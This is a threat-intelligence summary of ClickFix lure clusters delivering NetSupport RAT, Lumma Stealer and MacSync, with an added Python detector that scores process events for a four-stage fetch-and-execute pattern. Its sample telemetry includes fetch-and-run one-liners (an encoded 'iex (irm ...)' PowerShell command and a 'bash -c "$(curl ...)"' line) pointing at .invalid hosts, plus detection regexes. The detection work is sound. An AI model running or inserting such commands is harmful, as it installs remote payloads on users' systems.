Insikt Group tracked five distinct ClickFix social engineering clusters active since May 2024, impersonating brands like Intuit QuickBooks, Booking.com, and Birdeye to trick victims into manually executing malicious commands on Windows and macOS. All clusters follow a standardized four-stage execution pattern: obfuscated input, native shell execution via LOLBins, remote payload retrieval, and in-memory execution to minimize forensic artifacts. Primary payloads include NetSupport RAT, Lumma Stealer, and MacSync infostealer. One cluster uses OS detection to serve platform-tailored lures. Mitigations include disabling the Windows Run dialog via GPO, enforcing PowerShell Constrained Language Mode, restricting Terminal access on macOS via MDM, and operationalizing threat intelligence to block C2 infrastructure. ClickFix is expected to remain a primary initial access vector through 2026, with future iterations likely incorporating browser fingerprinting and more resilient obfuscation.
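The four-stage pattern above (obfuscated input, LOLBin shell, remote fetch, in-memory execution) is also what a detection engineer would key on. The following is an added example, not code from the Insikt Group report: a heuristic scorer run over constructed process-creation events, one point per stage observed plus one when the parent process indicates a pasted command (the Win+R Run dialog spawns children from explorer.exe; the macOS lure asks for Terminal). It also decodes a PowerShell -EncodedCommand argument (base64 of UTF-16LE) so that the "iex (irm ...)" hidden inside the obfuscated stage is matched as well. The regexes, event field names, parent list, thresholds and the .invalid hostnames are assumptions for the example, not indicators from the report.

```python
"""
Heuristic detector for the four-stage ClickFix execution pattern, run over
constructed process-creation events. Added example; the regexes, field names
and thresholds are assumptions, not the Insikt Group's detections.
"""
import base64
import re
from typing import Optional

# One regex per stage, applied to the command line (and to the decoded
# -EncodedCommand payload, where present). Tune these to your own telemetry.
STAGES = {
    "lolbin": re.compile(
        r"\b(powershell|pwsh|mshta|cmd|wscript|cscript|msiexec|curl|bash|zsh|sh|osascript)(?:\.exe)?\b",
        re.I),
    "remote_fetch": re.compile(
        r"(https?://|\biwr\b|\birm\b|invoke-(?:webrequest|restmethod)|download(?:string|file)|\bcurl\b|\bwget\b)",
        re.I),
    "in_memory": re.compile(
        r"(\biex\b|invoke-expression|-e(?:c|nc|ncodedcommand)?\b|\bmshta\b|\|\s*(?:bash|zsh|sh)\b|\$\((?:curl|wget)\b|osascript\s+-e)",
        re.I),
    "obfuscation": re.compile(
        r"(-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}|\[char\]|frombase64string|-w(?:indowstyle)?\s+h(?:idden)?\b|-nop\b|-e(?:p|xecutionpolicy)\s+bypass|\^|`)",
        re.I),
}
# Parents that indicate a human pasted the command (assumed list).
PASTE_PARENTS = {"explorer.exe", "terminal"}
ENC_ARG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext of a PowerShell -EncodedCommand argument (base64 of
    UTF-16LE), or None when there is none or it does not decode."""
    m = ENC_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(event: dict) -> dict:
    """Score one event: one point per stage observed, plus one when the parent
    indicates a pasted command. Returns stage hits, decoded payload, score, verdict."""
    cmdline = event["cmdline"]
    decoded = decode_encoded_command(cmdline)
    # Match against the decoded payload too: that is where "iex (irm ...)" hides.
    text = cmdline if decoded is None else cmdline + "\n" + decoded
    hits = {name: bool(rx.search(text)) for name, rx in STAGES.items()}
    pasted = event.get("parent", "").lower() in PASTE_PARENTS
    score = sum(hits.values()) + int(pasted)
    verdict = "clickfix" if score >= 4 else "suspicious" if score >= 2 else "benign"
    return {"image": event.get("image"), "stages": hits, "pasted": pasted,
            "decoded": decoded, "score": score, "verdict": verdict}


def detect(events) -> list:
    """Return (image, verdict) for every event that is not benign."""
    results = [analyze(e) for e in events]
    return [(r["image"], r["verdict"]) for r in results if r["verdict"] != "benign"]


# Constructed sample telemetry (hostnames under .invalid; not real indicators).
_ENC = base64.b64encode(
    "iex (irm 'https://example.invalid/loader.txt')".encode("utf-16-le")).decode("ascii")
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "powershell.exe",                      # Windows lure
     "cmdline": f"powershell.exe -w hidden -nop -e {_ENC}"},
    {"parent": "Terminal", "image": "bash",                                    # macOS lure
     "cmdline": '/bin/bash -c "$(curl -fsSL https://example.invalid/update.sh)"'},
    {"parent": "services.exe", "image": "powershell.exe",                      # scheduled task
     "cmdline": r"powershell.exe -NoProfile -File C:\ProgramData\backup\nightly.ps1"},
    {"parent": "explorer.exe", "image": "powershell.exe",                      # user-run script
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\Users\alice\fix-printer.ps1"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        r = analyze(ev)
        print(f"{r['verdict']:10} score={r['score']} stages={r['stages']} decoded={r['decoded']!r}")
```

The scoring is deliberately additive rather than a single signature: the Windows sample only reveals its fetch-and-execute stages after the -EncodedCommand argument is decoded, and the user-run script with an execution-policy bypass lands as "suspicious" rather than "clickfix" because it neither fetches nor executes remote content. Expect false positives from administrators who run `iex (irm ...)` installers by hand; the parent-process point and the Run-dialog history in the RunMRU registry key are the usual tie-breakers.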
Table of contents
Executive Summary
Key Findings
Background
Technical Analysis
ClickFix Clusters
Cluster 1: Intuit QuickBooks
Cluster 2: Booking.com
Cluster 3: Birdeye
Cluster 4: Dual-Platform Selection
Copy Command Analysis
Mitigations
Outlook
Appendix A: Indicators of Compromise
Appendix B: Cluster 1 — Intuit QuickBooks Indicators
Appendix C: bibi.php Script
Appendix D: Cluster 2 — Booking.com Indicators
Appendix E: Cluster 3 — Birdeye Indicators
Appendix F: Birdeye Cluster Javascript
Appendix G: Cluster 4 — Dual-Platform Selection Indicators